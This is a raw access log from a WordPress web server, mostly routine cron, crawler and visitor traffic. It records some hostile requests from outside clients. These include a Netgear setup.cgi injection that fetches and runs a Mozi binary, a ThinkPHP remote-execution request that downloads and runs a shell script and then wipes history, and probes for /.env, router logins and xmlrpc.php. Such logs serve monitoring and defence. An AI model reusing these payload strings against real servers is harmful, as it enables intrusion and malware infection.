36.133.115.36 - - [25/Aug/2025:20:16:49 +0800] "POST /wp-cron.php?doing_wp_cron=1756124209.1425418853759765625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
196.251.84.253 - - [25/Aug/2025:20:16:49 +0800] "GET / HTTP/1.0" 200 141726 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
36.133.115.36 - - [25/Aug/2025:20:19:27 +0800] "POST /wp-cron.php?doing_wp_cron=1756124367.2982831001281738281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.203.56.3 - - [25/Aug/2025:20:19:27 +0800] "GET / HTTP/1.1" 301 5 "-" "HTTP Banner Detection (https://security.ipip.net)"
36.133.115.36 - - [25/Aug/2025:20:23:49 +0800] "POST /wp-cron.php?doing_wp_cron=1756124629.3606729507446289062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
104.155.20.12 - - [25/Aug/2025:20:23:49 +0800] "GET / HTTP/1.1" 301 5 "-" "python-requests/2.32.4"
36.133.115.36 - - [25/Aug/2025:20:30:42 +0800] "POST /wp-cron.php?doing_wp_cron=1756125042.6177740097045898437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [25/Aug/2025:20:31:02 +0800] "GET / HTTP/1.1" 200 96805 "-" "-"
36.133.115.36 - - [25/Aug/2025:20:35:18 +0800] "POST /wp-cron.php?doing_wp_cron=1756125318.8845479488372802734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
196.251.69.194 - - [25/Aug/2025:20:35:19 +0800] "GET / HTTP/1.0" 200 151647 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
52.167.144.17 - - [25/Aug/2025:20:35:41 +0800] "GET /wp-content/uploads/2025/07/1750945514-honor300%C3%97206_3.webp HTTP/1.1" 200 74124 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [25/Aug/2025:20:42:14 +0800] "POST /wp-cron.php?doing_wp_cron=1756125734.4961149692535400390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
128.0.28.17 - - [25/Aug/2025:20:42:19 +0800] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 31368 "-" "-"
36.133.115.36 - - [25/Aug/2025:20:45:55 +0800] "POST /wp-cron.php?doing_wp_cron=1756125955.6784720420837402343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
206.168.34.80 - - [25/Aug/2025:20:45:55 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.80 - - [25/Aug/2025:20:46:04 +0800] "GET / HTTP/1.1" 200 33858 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.80 - - [25/Aug/2025:20:46:29 +0800] "GET /.well-known/security.txt HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
52.167.144.146 - - [25/Aug/2025:20:52:03 +0800] "GET /wp-content/uploads/2025/07/1751864682-Logistics800x500_2.webp HTTP/1.1" 200 27420 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [25/Aug/2025:20:56:07 +0800] "POST /wp-cron.php?doing_wp_cron=1756126567.2785489559173583984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.7.190.170 - - [25/Aug/2025:20:56:07 +0800] "GET /services/ HTTP/1.1" 200 19715 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
36.7.190.170 - - [25/Aug/2025:20:56:26 +0800] "GET /services/ HTTP/1.1" 200 19715 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
36.133.115.36 - - [25/Aug/2025:20:57:05 +0800] "POST /wp-cron.php?doing_wp_cron=1756126625.8962810039520263671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.7.190.170 - - [25/Aug/2025:20:57:06 +0800] "GET /services/ HTTP/1.1" 200 19716 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
36.7.190.170 - - [25/Aug/2025:20:57:32 +0800] "GET /services/ HTTP/1.1" 200 19715 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
36.133.115.36 - - [25/Aug/2025:20:58:15 +0800] "POST /wp-cron.php?doing_wp_cron=1756126695.2450129985809326171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.7.190.170 - - [25/Aug/2025:20:58:15 +0800] "GET /services/ HTTP/1.1" 200 19715 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
36.7.190.170 - - [25/Aug/2025:20:58:44 +0800] "GET /services/ HTTP/1.1" 200 19716 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
36.133.115.36 - - [25/Aug/2025:20:59:15 +0800] "POST /wp-cron.php?doing_wp_cron=1756126755.6521220207214355468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.7.190.170 - - [25/Aug/2025:20:59:15 +0800] "GET /services/ HTTP/1.1" 200 19715 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
36.133.115.36 - - [25/Aug/2025:20:59:46 +0800] "POST /wp-cron.php?doing_wp_cron=1756126786.3653180599212646484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.7.190.170 - - [25/Aug/2025:20:59:46 +0800] "GET /services/ HTTP/1.1" 200 19715 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
36.7.190.170 - - [25/Aug/2025:21:00:01 +0800] "GET /services/ HTTP/1.1" 200 19715 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
36.7.190.170 - - [25/Aug/2025:21:00:33 +0800] "GET /services/ HTTP/1.1" 200 19715 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
36.133.115.36 - - [25/Aug/2025:21:01:05 +0800] "POST /wp-cron.php?doing_wp_cron=1756126865.4649019241333007812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.7.190.170 - - [25/Aug/2025:21:01:05 +0800] "GET /services/ HTTP/1.1" 200 19715 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
36.7.190.170 - - [25/Aug/2025:21:01:21 +0800] "GET /services/ HTTP/1.1" 200 19715 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
36.133.115.36 - - [25/Aug/2025:21:01:53 +0800] "POST /wp-cron.php?doing_wp_cron=1756126913.0174880027770996093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.7.190.170 - - [25/Aug/2025:21:01:53 +0800] "GET /services/ HTTP/1.1" 200 19715 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
36.7.190.170 - - [25/Aug/2025:21:02:23 +0800] "GET /services/ HTTP/1.1" 200 19715 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
36.133.115.36 - - [25/Aug/2025:21:03:36 +0800] "POST /wp-cron.php?doing_wp_cron=1756127016.7225589752197265625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
49.212.148.38 - - [25/Aug/2025:21:03:37 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [25/Aug/2025:21:05:52 +0800] "POST /wp-cron.php?doing_wp_cron=1756127152.1240220069885253906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [25/Aug/2025:21:05:52 +0800] "GET / HTTP/1.1" 200 33395 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [25/Aug/2025:21:49:42 +0800] "POST /wp-cron.php?doing_wp_cron=1756129782.2648348808288574218750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
95.217.232.190 - - [25/Aug/2025:21:49:42 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [25/Aug/2025:21:54:53 +0800] "POST /wp-cron.php?doing_wp_cron=1756130093.6019508838653564453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.127.195.188 - - [25/Aug/2025:21:54:53 +0800] "GET /developmentserver/metadatauploader HTTP/1.1" 404 8989 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [25/Aug/2025:21:57:58 +0800] "POST /wp-cron.php?doing_wp_cron=1756130278.0698781013488769531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.153.73.200 - - [25/Aug/2025:21:57:58 +0800] "GET / HTTP/1.1" 200 33395 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [25/Aug/2025:22:00:40 +0800] "POST /wp-cron.php?doing_wp_cron=1756130440.3589448928833007812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
107.175.141.10 - - [25/Aug/2025:22:00:41 +0800] "GET / HTTP/1.1" 200 151669 "-" "-"
36.133.115.36 - - [25/Aug/2025:22:13:17 +0800] "POST /wp-cron.php?doing_wp_cron=1756131197.5809509754180908203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [25/Aug/2025:22:13:42 +0800] "GET / HTTP/1.1" 200 109837 "-" "-"
36.133.115.36 - - [25/Aug/2025:22:19:40 +0800] "POST /wp-cron.php?doing_wp_cron=1756131580.0690090656280517578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.143.248.236 - - [25/Aug/2025:22:19:40 +0800] "GET / HTTP/1.1" 200 33395 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [25/Aug/2025:22:21:39 +0800] "POST /wp-cron.php?doing_wp_cron=1756131699.7449250221252441406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
78.72.230.167 - - [25/Aug/2025:22:21:39 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://78.72.230.167:39950/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 31368 "-" "-"
36.133.115.36 - - [25/Aug/2025:22:38:54 +0800] "POST /wp-cron.php?doing_wp_cron=1756132734.6768820285797119140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
162.240.239.64 - - [25/Aug/2025:22:38:54 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [25/Aug/2025:22:46:10 +0800] "POST /wp-cron.php?doing_wp_cron=1756133170.8839569091796875000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
66.249.70.132 - - [25/Aug/2025:22:46:10 +0800] "GET /robots.txt HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.168 - - [25/Aug/2025:22:46:12 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
116.7.53.183 - - [25/Aug/2025:22:56:59 +0800] "GET /public/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp/;%20wget%20http://172.233.82.130/vtubers.sh;%20chmod%20777%20vtubers.sh;%20./vtubers.sh;%20rm%20-rf%20vtubers.sh;%20history%20-c HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [25/Aug/2025:23:03:33 +0800] "POST /wp-cron.php?doing_wp_cron=1756134213.2156119346618652343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
49.51.178.45 - - [25/Aug/2025:23:03:33 +0800] "GET / HTTP/1.1" 200 33396 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
34.94.216.214 - - [25/Aug/2025:23:08:58 +0800] "OPTIONS / HTTP/1.0" 405 150 "-" "-"
36.133.115.36 - - [25/Aug/2025:23:10:00 +0800] "POST /wp-cron.php?doing_wp_cron=1756134600.5993020534515380859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
66.249.70.168 - - [25/Aug/2025:23:10:00 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.133.115.36 - - [25/Aug/2025:23:10:48 +0800] "POST /wp-cron.php?doing_wp_cron=1756134648.4432320594787597656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
196.251.81.194 - - [25/Aug/2025:23:10:48 +0800] "GET /.env HTTP/1.1" 404 8989 "-" "SonyEricssonT100/R101"
36.133.115.36 - - [25/Aug/2025:23:17:43 +0800] "POST /wp-cron.php?doing_wp_cron=1756135063.2962770462036132812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [25/Aug/2025:23:17:43 +0800] "GET / HTTP/1.1" 200 33395 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [25/Aug/2025:23:35:10 +0800] "POST /wp-cron.php?doing_wp_cron=1756136110.6251978874206542968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
212.147.5.172 - - [25/Aug/2025:23:35:10 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [25/Aug/2025:23:47:59 +0800] "POST /wp-cron.php?doing_wp_cron=1756136879.1420519351959228515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
183.94.149.222 - - [25/Aug/2025:23:47:59 +0800] "GET http://www.cqqizhou.com/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
183.94.149.222 - - [25/Aug/2025:23:47:59 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 33858 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
42.86.133.87 - - [25/Aug/2025:23:49:07 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 33858 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [25/Aug/2025:23:56:19 +0800] "POST /wp-cron.php?doing_wp_cron=1756137379.0529890060424804687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.130.60.195 - - [25/Aug/2025:23:56:19 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.130.60.195 - - [25/Aug/2025:23:56:21 +0800] "GET / HTTP/1.1" 200 33395 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
91.224.92.17 - - [25/Aug/2025:23:57:05 +0800] "GET / HTTP/1.1" 200 96805 "-" "-"